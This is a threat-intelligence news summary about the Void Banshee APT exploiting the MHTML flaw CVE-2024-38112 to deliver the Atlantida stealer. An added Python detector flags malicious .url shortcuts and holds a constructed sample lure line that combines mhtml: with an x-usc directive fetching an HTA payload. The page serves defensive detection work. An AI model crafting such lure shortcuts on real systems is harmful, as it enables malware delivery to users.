Void Banshee APT Exploits Microsoft MHTML Flaw to Spread Atlantida Stealer
An advanced persistent threat group called Void Banshee has been observed exploiting a recently disclosed security flaw in the Microsoft MHTML browser engine as a zero-day to deliver an information stealer called Atlantida.
"Variations of the Atlantida campaign have been highly active throughout 2024 and have evolved to use CVE-2024-38112 as part of Void Banshee infection chains," security researchers Peter Girnus and Aliakbar Zahravi said.
"The ability of APT groups like Void Banshee to exploit disabled services such as poses a significant threat to organizations worldwide."
Opening the HTA file results in the execution of a Visual Basic Script that, in turn, downloads and runs a PowerShell script responsible for retrieving a .NET trojan loader, which ultimately uses the Donut shellcode project to decrypt and execute the Atlantida stealer inside RegAsm.
"By using specially crafted URL files that contained the MHTML protocol handler and the x-usc! directive, Void Banshee was able to access and run HTML Application files directly through the disabled IE process," the researchers said.
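The lure described above is an Internet Shortcut (.url) file whose target combines the MHTML protocol handler with the x-usc directive. The following is an added detection example written for this page (it is not code from the article or from the researchers): it parses .url file contents and flags the combination the article describes. The sample file contents, the 203.0.113.10 address and the field layout of the lure are constructed for illustration; the real samples' exact structure is not given here and is an assumption.

```python
import re
from configparser import ConfigParser, Error as ConfigParserError
from pathlib import Path
from typing import Dict, List

# Heuristics derived from the article's description of the chain: a .url target
# that starts with the MHTML handler and carries an x-usc directive, typically
# pointing at an HTA. The exact directive form "!x-usc:" is an assumption.
MHTML_SCHEME = re.compile(r"^\s*mhtml:", re.IGNORECASE)
X_USC_DIRECTIVE = re.compile(r"!x-usc:", re.IGNORECASE)
HTA_REFERENCE = re.compile(r"\.hta\b", re.IGNORECASE)

# Constructed sample inputs (not real IoCs): one lure-style shortcut, one benign.
SUSPICIOUS_URL_FILE = """[InternetShortcut]
URL=mhtml:http://203.0.113.10/lure.html!x-usc:http://203.0.113.10/payload.hta
IconFile=C:\\Windows\\System32\\SHELL32.dll
IconIndex=1
"""
BENIGN_URL_FILE = """[InternetShortcut]
URL=https://www.example.com/
"""


def extract_shortcut_targets(content: str) -> List[str]:
    """Return every URL= value in an Internet Shortcut (.url) file body.

    .url files are INI-style. Only '=' is treated as a key/value delimiter so
    that the ':' inside 'mhtml:http://...' is kept as part of the value. Lures
    are often malformed, so a plain line scan is used if INI parsing fails.
    """
    targets: List[str] = []
    parser = ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    try:
        parser.read_string(content)
        for section in parser.sections():
            for key, value in parser.items(section):
                if key.lower() == "url":
                    targets.append(value.strip())
    except ConfigParserError:
        pass
    if not targets:
        for line in content.splitlines():
            if line.lower().startswith("url="):
                targets.append(line[4:].strip())
    return targets


def classify_shortcut(content: str) -> List[str]:
    """Return sorted finding tags for a .url file body; empty list means no hit."""
    findings = set()
    for target in extract_shortcut_targets(content):
        if MHTML_SCHEME.search(target):
            findings.add("mhtml-handler")
        if X_USC_DIRECTIVE.search(target):
            findings.add("x-usc-directive")
        if HTA_REFERENCE.search(target):
            findings.add("hta-target")
    return sorted(findings)


def scan_directory(root: str) -> Dict[str, List[str]]:
    """Walk a directory tree and report every .url file that triggers a finding."""
    hits: Dict[str, List[str]] = {}
    for path in Path(root).rglob("*.url"):
        try:
            body = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        tags = classify_shortcut(body)
        if tags:
            hits[str(path)] = tags
    return hits


if __name__ == "__main__":
    print("suspicious:", classify_shortcut(SUSPICIOUS_URL_FILE))
    print("benign:", classify_shortcut(BENIGN_URL_FILE))
```

Point `scan_directory` at user download and mail-attachment folders; a shortcut that trips both `mhtml-handler` and `x-usc-directive` is worth pulling for analysis regardless of whether `hta-target` also fires, since the HTA name can be arbitrary.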
Not much is known about Void Banshee other than the fact that it has a history of targeting North American, European, and Southeast Asian regions for information theft and financial gain.
News URL
https://thehackernews.com/2024/07/void-banshee-apt-exploits-microsoft.html
Related Vulnerability
| DATE | CVE | VULNERABILITY TITLE | RISK |
|---|---|---|---|
| 2024-07-09 | CVE-2024-38112 | Unspecified vulnerability in Microsoft products Windows MSHTML Platform Spoofing Vulnerability | 7.5 |